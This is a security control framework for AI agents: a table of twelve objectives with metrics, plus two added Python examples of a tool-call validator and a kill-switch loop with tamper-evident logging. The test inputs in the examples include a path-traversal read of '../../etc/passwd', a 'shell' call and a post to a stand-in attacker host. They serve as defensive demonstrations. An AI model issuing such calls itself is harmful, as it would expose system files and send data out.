Control Objectives
| ID | Objective | Description | Primary Risk Addressed | Key Metric |
|---|---|---|---|---|
| SEC-01 | Identity and Access Management | Implement comprehensive identity and access management for agents themselves and for the users interacting with them. | Unauthorized agent or user access | Access control compliance rate |
| SEC-02 | Network Segmentation | Segment the network so that a compromised agent cannot move laterally and security incidents are contained. | Lateral movement from compromised agents | Segmentation policy compliance |
| SEC-03 | Input Validation Coverage | Ensure comprehensive validation of all agent inputs to prevent injection and manipulation attacks. | Injection and manipulation attacks | % agents with input validation |
| SEC-04 | Output Sanitization | Sanitize all agent outputs so that sensitive information is redacted and data cannot leak through responses. | Data leakage through responses | Output violation incidents |
| SEC-05 | Threat Model Currency | Maintain a current threat model for every agent, updated regularly to reflect new attack vectors and vulnerabilities. | Unidentified attack vectors | Threat model review recency |
| SEC-06 | Adversarial Testing Coverage | Conduct regular adversarial testing (red team exercises) of high-tier (Tier 3+) agents to discover vulnerabilities before attackers do. | Undiscovered vulnerabilities | % Tier 3+ agents with red team exercise |
| SEC-07 | Supply Chain Security | Verify the provenance and integrity of all models, components, and dependencies used by agents. | Compromised models or components | Verified provenance percentage |
| SEC-08 | Vendor Security Assessment | Conduct and keep current security assessments of all third-party vendors providing agent components or services. | Third-party security gaps | % vendors with current assessment |
| SEC-09 | Concentration Risk Management | Monitor and manage concentration risk from over-dependence on single providers for models, infrastructure, or services. | Over-dependence on single providers | Concentration risk score |
| SEC-10 | Incident Response Readiness | Maintain tested incident response procedures specific to AI agent security incidents, including breach response playbooks. | Slow or ineffective breach response | Incident response drill success rate |
| SEC-11 | Kill Switch Availability | Ensure every agent has a tested kill switch that can immediately halt its operation in case of compromise or malfunction. | Inability to stop compromised agents | % agents with tested kill switch |
| SEC-12 | Forensic Logging Adequacy | Maintain comprehensive forensic logging that enables investigation and attribution of security incidents involving agents. | Inability to investigate incidents | Log completeness score |
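The following is an added example, not code from the original page or from any framework it describes, showing what SEC-03 (Input Validation Coverage) and SEC-04 (Output Sanitization) look like as a concrete control at the boundary between an agent and its tools. It validates every tool call against a deny-by-default allowlist and redacts sensitive patterns from agent output, counting each redaction toward the "Output violation incidents" metric. The tool names, argument validators, redaction patterns and sample calls are assumptions constructed for the demonstration.

```python
"""Added example, not from the original page: a guard at the agent/tool boundary
covering SEC-03 (input validation) and SEC-04 (output sanitization).
Tool names, argument validators and redaction patterns are assumptions."""
import re
from dataclasses import dataclass


def _safe_path(v):
    """Relative path made of safe characters, with no '..' segment."""
    return (isinstance(v, str)
            and re.fullmatch(r"[A-Za-z0-9_./-]+", v) is not None
            and ".." not in v.split("/")
            and not v.startswith("/"))


def _https_url(v):
    """HTTPS only; the host class excludes '@' (userinfo), whitespace and controls."""
    return (isinstance(v, str)
            and re.fullmatch(r"https://[A-Za-z0-9.-]+(/[A-Za-z0-9_./?=&%-]*)?", v) is not None)


# Assumed tool allowlist: every argument of every callable tool has a validator.
ALLOWED_TOOLS = {
    "read_file": {"path": _safe_path},
    "http_get": {"url": _https_url},
}

# Assumed patterns for data that must never leave the agent unredacted.
REDACTIONS = [
    (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "[REDACTED:aws_key]"),
    (re.compile(r"\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b"), "[REDACTED:ssn]"),
    (re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"), "[REDACTED:email]"),
]


@dataclass
class GuardMetrics:
    input_rejections: int = 0
    output_violations: int = 0   # feeds SEC-04's "Output violation incidents"


class AgentGuard:
    def __init__(self):
        self.metrics = GuardMetrics()

    def validate_call(self, tool, args):
        """Deny by default: unknown tool, unexpected argument set, or a value
        that fails its validator. Returns (ok, reason)."""
        schema = ALLOWED_TOOLS.get(tool)
        if schema is None:
            return self._reject(f"tool not allowlisted: {tool}")
        if not isinstance(args, dict) or set(args) != set(schema):
            return self._reject("argument set does not match tool schema")
        for name, validator in schema.items():
            if not validator(args[name]):
                return self._reject(f"argument {name!r} failed validation")
        return True, "ok"

    def _reject(self, reason):
        self.metrics.input_rejections += 1
        return False, reason

    def sanitize_output(self, text):
        """Redact sensitive patterns; every hit counts as one output violation."""
        for pattern, replacement in REDACTIONS:
            text, hits = pattern.subn(replacement, text)
            self.metrics.output_violations += hits
        return text


if __name__ == "__main__":
    guard = AgentGuard()
    # Constructed tool calls an LLM might emit, including injected ones.
    for call in [("read_file", {"path": "docs/readme.md"}),
                 ("read_file", {"path": "../../etc/passwd"}),
                 ("shell", {"cmd": "id"})]:
        print(call, guard.validate_call(*call))
    print(guard.sanitize_output("key AKIAIOSFODNN7EXAMPLE for bob@example.com"))
    print(guard.metrics)
```

The validation is deliberately structural: it checks the shape of what the model wants to execute, not the natural-language prompt, because a tool call with a path traversal or a non-allowlisted tool is something a deterministic check can reject reliably, whereas prompt injection in free text is not. The rejection and redaction counters are what the two metrics in the table are built from.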
Quick Reference
| ID | Objective | Primary Risk Addressed | Key Metric |
|---|---|---|---|
| SEC-01 | Identity and Access Management | Unauthorized agent or user access | Access control compliance rate |
| SEC-02 | Network Segmentation | Lateral movement from compromised agents | Segmentation policy compliance |
| SEC-03 | Input Validation Coverage | Injection and manipulation attacks | % agents with input validation |
| SEC-04 | Output Sanitization | Data leakage through responses | Output violation incidents |
| SEC-05 | Threat Model Currency | Unidentified attack vectors | Threat model review recency |
| SEC-06 | Adversarial Testing Coverage | Undiscovered vulnerabilities | % Tier 3+ agents with red team exercise |
| SEC-07 | Supply Chain Security | Compromised models or components | Verified provenance percentage |
| SEC-08 | Vendor Security Assessment | Third-party security gaps | % vendors with current assessment |
| SEC-09 | Concentration Risk Management | Over-dependence on single providers | Concentration risk score |
| SEC-10 | Incident Response Readiness | Slow or ineffective breach response | Incident response drill success rate |
| SEC-11 | Kill Switch Availability | Inability to stop compromised agents | % agents with tested kill switch |
| SEC-12 | Forensic Logging Adequacy | Inability to investigate incidents | Log completeness score |
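As an added example (not code from the original page or any framework it describes), the block below shows SEC-11 (Kill Switch Availability) and SEC-12 (Forensic Logging Adequacy) together in one agent step loop: the kill switch is consulted before every tool call rather than only at start-up, a monitor can trip it mid-run, and every step is written to a hash-chained log so that later edits or deletions are detectable during an investigation. It also includes a drill function, since SEC-11's metric counts tested kill switches, not merely present ones. The agent, its tools, the monitor's allowlist and the log record layout are assumptions constructed for the demonstration.

```python
"""Added example, not from the original page: an agent loop with a kill switch
(SEC-11) and hash-chained forensic logging (SEC-12). Tools, monitor policy and
record layout are assumptions."""
import hashlib
import json
import threading
import time

GENESIS = "0" * 64


class ForensicLog:
    """Append-only records where each entry commits to the previous entry's hash,
    so editing or dropping an entry after the fact breaks verify()."""
    def __init__(self):
        self.records = []
        self.prev_hash = GENESIS

    def append(self, event, **fields):
        record = {"seq": len(self.records), "ts": time.time(), "event": event,
                  "prev": self.prev_hash, **fields}
        body = json.dumps(record, sort_keys=True).encode()
        record["hash"] = hashlib.sha256(body).hexdigest()
        self.records.append(record)
        self.prev_hash = record["hash"]
        return record

    def verify(self):
        prev = GENESIS
        for r in self.records:
            body = {k: v for k, v in r.items() if k != "hash"}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            if body["prev"] != prev or digest != r["hash"]:
                return False
            prev = r["hash"]
        return True


def anomaly_monitor(kill, allowed=frozenset({"read_file", "summarize"})):
    """Assumed policy: any tool outside the allowlist trips the kill switch."""
    def check(step):
        if step["tool"] not in allowed:
            kill.set()
    return check


class Agent:
    def __init__(self, log, kill, monitor):
        self.log = log
        self.kill = kill          # threading.Event shared with operators/monitors
        self.monitor = monitor

    def run(self, plan, max_steps=10):
        self.log.append("run_start", plan=plan)
        for i, step in enumerate(plan[:max_steps]):
            self.monitor(step)                      # may trip the switch
            if self.kill.is_set():                  # checked before EVERY call
                self.log.append("halted", reason="kill_switch", at_step=i)
                return "halted"
            result = self._execute(step)
            self.log.append("step", index=i, tool=step["tool"],
                            args=step["args"], result=result)
        self.log.append("run_end")
        return "completed"

    def _execute(self, step):
        return f"ok:{step['tool']}"                 # stand-in for real tool execution


def kill_switch_drill():
    """The test SEC-11's metric asks for: trip the switch, confirm the agent halts
    without executing anything."""
    kill, log = threading.Event(), ForensicLog()
    agent = Agent(log, kill, monitor=lambda step: None)
    kill.set()
    status = agent.run([{"tool": "read_file", "args": {"path": "a.txt"}}])
    executed = [r for r in log.records if r["event"] == "step"]
    return status == "halted" and not executed


def demo():
    kill, log = threading.Event(), ForensicLog()
    agent = Agent(log, kill, monitor=anomaly_monitor(kill))
    plan = [  # constructed plan; the third step is the anomaly
        {"tool": "read_file", "args": {"path": "report.txt"}},
        {"tool": "summarize", "args": {"max_words": 50}},
        {"tool": "http_post", "args": {"url": "https://attacker.example/x"}},
    ]
    status = agent.run(plan)
    intact = log.verify()
    log.records[1]["tool"] = "shell"                # simulate post-hoc tampering
    return status, len(log.records), intact, log.verify()


if __name__ == "__main__":
    print(demo())                                   # ('halted', 4, True, False)
    print("drill passed:", kill_switch_drill())
```

Two details matter for the metrics in the table. For "Log completeness score", the chain only proves that nothing was altered or removed after being written; a step that never produced a record is invisible to it, so the agent must log before and after each action, as the loop does. For "% agents with tested kill switch", the drill exercises the same code path a real compromise would, which is the only evidence that the switch works.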